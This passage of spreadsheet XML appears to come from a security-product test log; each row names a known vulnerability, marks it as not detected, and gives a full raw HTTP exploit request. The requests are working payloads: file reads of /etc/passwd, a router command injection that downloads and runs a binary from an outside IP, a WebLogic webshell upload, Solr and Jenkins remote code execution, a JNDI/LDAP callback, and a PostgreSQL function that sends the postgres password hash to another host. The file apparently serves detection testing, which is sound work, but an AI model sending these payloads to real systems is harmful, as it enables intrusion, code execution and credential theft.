      <c r="A116" s="2" t="inlineStr">
        <is>
          <t>Apache Solr远程代码注入(CVE-2019-17558)</t>
        </is>
      </c>
      <c r="B116" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C116" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /solr/admin/cores?indexInfo=false&amp;wt=json HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D116" s="0">
        <f>_xlfn.ENCODEURL(C116)</f>
        <v/>
      </c>
    </row>
    <row r="117" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A117" s="2" t="inlineStr">
        <is>
          <t>Nexus Repository Manager 3 远程命令执行_1</t>
        </is>
      </c>
      <c r="B117" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C117" s="0" t="inlineStr">
        <is>
          <t>POST /service/rest/beta/repositories/go/group HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 203
Accept-Encoding: identity
Content-Type: application/json
Nx-Anti-Csrf-Token: 90f7407e-78bc-4803-b5a1-13d3aea66e9e
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Nexus-Ui: true
X-Requested-With: XMLHttpRequest
{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{233*233*233}"]
  }
}</t>
        </is>
      </c>
      <c r="D117" s="0">
        <f>_xlfn.ENCODEURL(C117)</f>
        <v/>
      </c>
    </row>
    <row r="118" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A118" s="2" t="inlineStr">
        <is>
          <t>Kibana本地文件包含漏洞利用</t>
        </is>
      </c>
      <c r="B118" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C118" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&amp;apis=../../../../../../../../../../../etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D118" s="0">
        <f>_xlfn.ENCODEURL(C118)</f>
        <v/>
      </c>
    </row>
    <row r="119" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A119" s="2" t="inlineStr">
        <is>
          <t>Apache Solr Velocity 注入远程命令执行</t>
        </is>
      </c>
      <c r="B119" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C119" s="0" t="inlineStr">
        <is>
          <t>POST /solr/demo/config HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 259
Accept-Encoding: identity
Content-Type: application/json
{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}</t>
        </is>
      </c>
      <c r="D119" s="0">
        <f>_xlfn.ENCODEURL(C119)</f>
        <v/>
      </c>
    </row>
    <row r="120" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A120" s="2" t="inlineStr">
        <is>
          <t>Lanproxy 任意文件读取(CVE-2021-3019)</t>
        </is>
      </c>
      <c r="B120" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C120" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /..%2Fconf/config.properties HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D120" s="0">
        <f>_xlfn.ENCODEURL(C120)</f>
        <v/>
      </c>
    </row>
    <row r="121" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A121" s="2" t="inlineStr">
        <is>
          <t>apache commons configuration任意代码执行</t>
        </is>
      </c>
      <c r="B121" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C121" s="0" t="inlineStr">
        <is>
          <t>POST /ruleinfo HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 180
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
!!org.apache.commons.configuration2.ConfigurationMap [!!org.apache.commons.configuration2.JNDIConfiguration [!!javax.naming.InitialContext [], "ldap://192.168.3.104:1389/Exploit"]]</t>
        </is>
      </c>
      <c r="D121" s="0">
        <f>_xlfn.ENCODEURL(C121)</f>
        <v/>
      </c>
    </row>
    <row r="122" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A122" s="2" t="inlineStr">
        <is>
          <t>SQL攻击：Sqlserver sql注入（url编码）</t>
        </is>
      </c>
      <c r="B122" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C122" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /%73%71%4c%53%65%72%76%65%72/%53%65%41%72%63%48/%73%45%61%72%63%68.%41%73%50?%6e%61%6d%65=%31%20%75%4e%69%6f%4e%20%53%65%6c%45%63%54%20%31%2c%32%2c%33%20%2d%2d%20 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D122" s="0">
        <f>_xlfn.ENCODEURL(C122)</f>
        <v/>
      </c>
    </row>
    <row r="123" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A123" s="2" t="inlineStr">
        <is>
          <t>Netlink GPON路由器命令注入</t>
        </is>
      </c>
      <c r="B123" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C123" s="0" t="inlineStr">
        <is>
          <t>POST /boaform/admin/formPing HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 75
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Pragma: no-cache
X-Requested-With: XMLHttpRequest
target_addr=;cd /tmp; rm -rf; wget http://51.254.23.227/bins/n;chmod 777 n;</t>
        </is>
      </c>
      <c r="D123" s="0">
        <f>_xlfn.ENCODEURL(C123)</f>
        <v/>
      </c>
    </row>
    <row r="124" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A124" s="2" t="inlineStr">
        <is>
          <t>华硕路由命令注入</t>
        </is>
      </c>
      <c r="B124" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C124" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /apply.cgi?current_page=Main_AdmStatus_Content.asp&amp;next_page=Main_AdmStatus_Content.asp&amp;next_host&amp;sid_list=FirewallConfig%3B&amp;group_id&amp;modified=0&amp;action_mode=+Refresh+&amp;first_time&amp;action_script&amp;preferred_lang=EN&amp;SystemCmd=touch%20/tmp/pwned&amp;action=Refresh HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D124" s="0">
        <f>_xlfn.ENCODEURL(C124)</f>
        <v/>
      </c>
    </row>
    <row r="125" ht="23.6" customHeight="1" s="6" thickBot="1">
      <c r="A125" s="2" t="inlineStr">
        <is>
          <t>WebLogic XMLDecoder反序列化(CVE-2017-10271)(后渗透)</t>
        </is>
      </c>
      <c r="B125" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C125" s="0" t="inlineStr">
        <is>
          <t>POST /wls-wsat/CoordinatorPortType HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 644
Accept-Encoding: identity
Content-Type: text/xml
&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt;
    &lt;soapenv:Header&gt;
    &lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
    &lt;java&gt;&lt;java version="1.4.0" class="java.beans.XMLDecoder"&gt;
    &lt;object class="java.io.PrintWriter"&gt; 
    &lt;string&gt;servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp&lt;/string&gt;
    &lt;void method="println"&gt;
&lt;string&gt;
    &lt;![CDATA[
&lt;% out.print("webshell"); %&gt;
    ]]&gt;
    &lt;/string&gt;
    &lt;/void&gt;
    &lt;void method="close"/&gt;
    &lt;/object&gt;&lt;/java&gt;&lt;/java&gt;
    &lt;/work:WorkContext&gt;
    &lt;/soapenv:Header&gt;
    &lt;soapenv:Body/&gt;
&lt;/soapenv:Envelope&gt;</t>
        </is>
      </c>
      <c r="D125" s="0">
        <f>_xlfn.ENCODEURL(C125)</f>
        <v/>
      </c>
    </row>
    <row r="126" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A126" s="2" t="inlineStr">
        <is>
          <t>Nginx越界读取缓存</t>
        </is>
      </c>
      <c r="B126" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C126" s="0" t="inlineStr">
        <is>
          <t>GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
Range: bytes=-1217,-9223372036854774591</t>
        </is>
      </c>
      <c r="D126" s="0">
        <f>_xlfn.ENCODEURL(C126)</f>
        <v/>
      </c>
    </row>
    <row r="127" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A127" s="2" t="inlineStr">
        <is>
          <t>PostgreSQL 提权</t>
        </is>
      </c>
      <c r="B127" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C127" s="0" t="inlineStr">
        <is>
          <t>Q_x0001_PCREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=192.168.248.133 port=5432 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;</t>
        </is>
      </c>
      <c r="D127" s="0">
        <f>_xlfn.ENCODEURL(C127)</f>
        <v/>
      </c>
    </row>
    <row r="128" ht="23.6" customHeight="1" s="6" thickBot="1">
      <c r="A128" s="2" t="inlineStr">
        <is>
          <t>CloudBees Jenkins Script Security Plugin 1.50命令执行</t>
        </is>
      </c>
      <c r="B128" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C128" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=%40GrabConfig%28disableChecksums%3dtrue%29%0a%40GrabResolver%28%27http%3a//10.8.51.239%3a8080%27%29%0a%40Grab%28%27GrantLLC%3aTranscof%3a7.7.2%27%29%0aimport%20Transcof HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
</t>
        </is>
      </c>
      <c r="D128" s="0">
        <f>_xlfn.ENCODEURL(C128)</f>
        <v/>
      </c>
    </row>
    <row r="129" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A129" s="2" t="inlineStr">
        <is>
          <t>Apache Solr远程代码执行</t>
        </is>
      </c>
      <c r="B129" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C129" s="0" t="inlineStr">
        <is>
          <t>POST /solr/test/dataimport?_=1565835261600&amp;indent=on&amp;wt=json HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 679
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
command=full-import&amp;verbose=false&amp;clean=false&amp;commit=true&amp;debug=true&amp;core=test&amp;dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&amp;name=dataimport</t>
        </is>
      </c>
      <c r="D129" s="0">
        <f>_xlfn.ENCODEURL(C129)</f>
        <v/>
      </c>
    </row>
    <row r="130" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A130" s="2" t="inlineStr">
        <is>
          <t>MySql身份认证绕过_2</t>
        </is>
      </c>
      <c r="B130" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C130" s="0" t="inlineStr">
        <is>
          <t>J
5.5.23)_x000B_4nR-("n)_x0008__x0002__x000F__x0015_{Uth-G^$4z,hmysql_native_password</t>
        </is>
      </c>
      <c r="D130" s="0">
        <f>_xlfn.ENCODEURL(C130)</f>
        <v/>
      </c>
    </row>
    <row r="131" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A131" s="2" t="inlineStr">
        <is>
          <t>Node.js 目录穿越</t>
        </is>
      </c>
      <c r="B131" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C131" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /static/../../../a/../../../../etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept-Encoding: identity
If-None-Match: W/"1f8-A9naZm3yu+VHL0CdBLtDGuvxxYs"
</t>
        </is>
      </c>
      <c r="D131" s="0">
        <f>_xlfn.ENCODEURL(C131)</f>
        <v/>
      </c>
    </row>
    <row r="132" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A132" s="2" t="inlineStr">
        <is>
          <t>Metabase 信息泄露</t>
        </is>
      </c>
      <c r="B132" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C132" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /api/geojson?url=file:////etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D132" s="0">
        <f>_xlfn.ENCODEURL(C132)</f>
        <v/>
      </c>
    </row>
    <row r="133" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A133" s="2" t="inlineStr">
        <is>
          <t>Nacos 认证绕过</t>
        </is>
      </c>
      <c r="B133" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C133" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">GET /nacos/v1/auth/users?pageNo=1&amp;pageSize=9 HTTP/1.1
User-Agent: Nacos-Server
Connection: close
Accept-Encoding: identity
</t>
        </is>
      </c>
      <c r="D133" s="0">
        <f>_xlfn.ENCODEURL(C133)</f>
        <v/>
      </c>
    </row>
    <row r="134" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A134" s="2" t="inlineStr">
        <is>
          <t>WordPress RegistrationMagic插件授权问题漏洞利用</t>
        </is>
      </c>
      <c r="B134" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C134" s="0" t="inlineStr">
        <is>
          <t xml:space="preserve">POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 76
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=rm_login_social_user&amp;email=admin%40localhost.org&amp;security=7c574ba56e </t>
        </is>
      </c>
      <c r="D134" s="0">
        <f>_xlfn.ENCODEURL(C134)</f>
        <v/>
      </c>
    </row>
    <row r="135" ht="14.6" customHeight="1" s="6" thickBot="1">
      <c r="A135" s="2" t="inlineStr">
        <is>
          <t>Webmin命令注入</t>
        </is>
      </c>
      <c r="B135" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C135" s="0" t="inlineStr">
        <is>
          <t>POST /password_change.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 60
Accept-Encoding: identity
DNT: 1
user=rootxx&amp;pam=&amp;expired=2&amp;old=test|id&amp;new1=test2&amp;new2=test2</t>
        </is>
      </c>
      <c r="D135" s="0">
        <f>_xlfn.ENCODEURL(C135)</f>
        <v/>
      </c>
    </row>
    <row r="136" ht="23.6" customHeight="1" s="6" thickBot="1">
      <c r="A136" s="2" t="inlineStr">
        <is>
          <t>TOTOLINK Technology 路由器命令注入（CVE-2022-26208）</t>
        </is>
      </c>
      <c r="B136" s="3" t="inlineStr">
        <is>
          <t>未能检测</t>
        </is>
      </c>
      <c r="C136" s="0" t="inlineStr">
        <is>
          <t>POST /cgi-bin/cstecgi.cgi HTTP/1.1</t>
        </is>
      </c>
      <c r="D136" s="0">
        <f>_xlfn.ENCODEURL(C136)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PC</dc:creator>
  <dcterms:created xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2024-04-29T01:14:03Z</dcterms:created>
  <dcterms:modified xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2025-01-23T02:12:48Z</dcterms:modified>
  <cp:lastModifiedBy>乐 王</cp:lastModifiedBy>
</cp:coreProperties>
</file>